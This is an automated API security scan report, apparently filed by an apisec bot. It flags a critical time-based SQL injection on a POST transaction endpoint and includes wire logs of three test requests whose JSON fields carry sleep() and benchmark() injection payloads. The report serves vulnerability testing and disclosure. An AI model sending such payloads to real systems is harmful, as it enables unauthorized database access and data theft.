Title: SQL_Injection_Timebound Vulnerability on POST:/api/v1/primary-transaction
Project: Sanity 7th July
Description:
Assertion Name: SQL Injection ( 1 )
Overview: SQL Injection is an attack. It is executed by inserting, or "injecting", a partial or complete SQL query via query parameters, request body parameters or path parameters, which the application then passes on to the application server or database.
Severity: SQL Injection is classified under the category of "Injection Attacks" by OWASP. "Injection Attacks" was consistently rated the number 1 category of attack by OWASP in 2010, 2013 and 2017 ( 2 ). SQL Injection is rated number 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A successful SQL Injection attack:
Can read sensitive data from the database
Can modify database data through Insert / Update / Delete statements
Can execute administrative operations on the database
Can recover the content of a given file existing on the database system
Can write files to the file system
Can issue commands to the operating system
Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically correct SQL query. If the API returns an error for an incorrect query, it becomes much easier for the attacker to reconstruct the logic of the original query. If errors are hidden, the attacker may have to reverse engineer the query before exploitation. The vulnerability may arise for the following reasons:
User-supplied data is NOT validated, filtered or sanitized by the application
Dynamic queries or non-parameterized calls are used without context-aware escaping
Remediation: A successful SQL Injection attack can be avoided by following the secure coding practices outlined in the OWASP SQL Injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.
Risk: SQL_Injection_Timebound
Severity: Critical
API Endpoint: http://95.217.118.53:8080/api/v1/primary-transaction
Environment: Master
Playbook: ApiV1PrimaryTransactionPostBodyParamSqlInjectionTimebound
Researcher: [apisec Bot]
QUICK TIPS
Suggestion:
Effort Estimate: null Hrs
Wire Logs:
00:46:02 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction]
00:46:02 [D] [AVPTPBPSITimebound] : Method [POST]
00:46:02 [D] [AVPTPBPSITimebound] : Authorization [Default]
00:46:02 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
00:46:02 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "5060", "availableBalance" : "1905065973", "createdBy" : "", "createdDate" : "", "description" : "' OR sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' OR sleep(7)=0; -- ", "type" : "' OR sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' OR sleep(7)=0; -- ", "version" : "" }, "version" : "" }]
00:46:02 [D] [AVPTPBPSITimebound] : Status code [200]
00:46:02 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=OWFhM2ZkNjQtNzcxYS00YWNiLThmZmEtNjczNjIwMjk4OTlj; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Tue, 14 Sep 2021 00:46:02 GMT"]]
00:46:02 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-14T00:46:02.835+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:46:02 [D] [AVPTPBPSITimebound] : Response time [135442]
00:46:02 [D] [AVPTPBPSITimebound] : Response size [306]
00:46:02 [E] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [135442 < 7000] result [Failed]
00:46:02 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:46:03 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction]
00:46:04 [D] [AVPTPBPSITimebound] : Method [POST]
00:46:04 [D] [AVPTPBPSITimebound] : Authorization [Default]
00:46:04 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
00:46:04 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "0825", "availableBalance" : "506433680", "createdBy" : "", "createdDate" : "", "description" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "type" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "version" : "" }, "version" : "" }]
00:46:04 [D] [AVPTPBPSITimebound] : Status code [200]
00:46:04 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZTY5MzE3OTEtNDQ1NC00Mzk5LWIzNzEtZDExMGJmNzA3Mzky; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Tue, 14 Sep 2021 00:46:03 GMT"]]
00:46:04 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-14T00:46:03.896+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:46:04 [D] [AVPTPBPSITimebound] : Response time [1043]
00:46:04 [D] [AVPTPBPSITimebound] : Response size [306]
00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [1043 < 7000] result [Passed]
00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:46:04 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction]
00:46:04 [D] [AVPTPBPSITimebound] : Method [POST]
00:46:04 [D] [AVPTPBPSITimebound] : Authorization [Default]
00:46:04 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
00:46:04 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "2727", "availableBalance" : "377611827", "createdBy" : "", "createdDate" : "", "description" : "' AND sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' AND sleep(7)=0; -- ", "type" : "' AND sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' AND sleep(7)=0; -- ", "version" : "" }, "version" : "" }]
00:46:04 [D] [AVPTPBPSITimebound] : Status code [200]
00:46:04 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YmRjOWViOWUtYjc2Ni00NGJlLThhMmYtZjY1ODM1ZjU2YmU5; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Tue, 14 Sep 2021 00:46:04 GMT"]]
00:46:04 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-14T00:46:04.670+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:46:04 [D] [AVPTPBPSITimebound] : Response time [771]
00:46:04 [D] [AVPTPBPSITimebound] : Response size [306]
00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [771 < 7000] result [Passed]
00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
IMPORTANT LINKS
Vulnerability Details: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e27bce7d6d017be1c4ad9133d4/details
Project: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/allScans
Environment: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/environments/8a8093567a8012b6017a803bf3181500/edit
Scan Dashboard: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/profiles/8a8093567a8012b6017a803c070d16cb/runs/8a8094e27bce7d6d017be1c0ae8030e8
Playbook: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/playbooks/ApiV1PrimaryTransactionPostBodyParamSqlInjectionTimebound
Coverage: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/categories
Code Sample: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e27bce7d6d017be1c4ad9133d4/codesamples
PS: Please contact support@apisec.ai for apisec access and login issues.
--- apisec Bot ---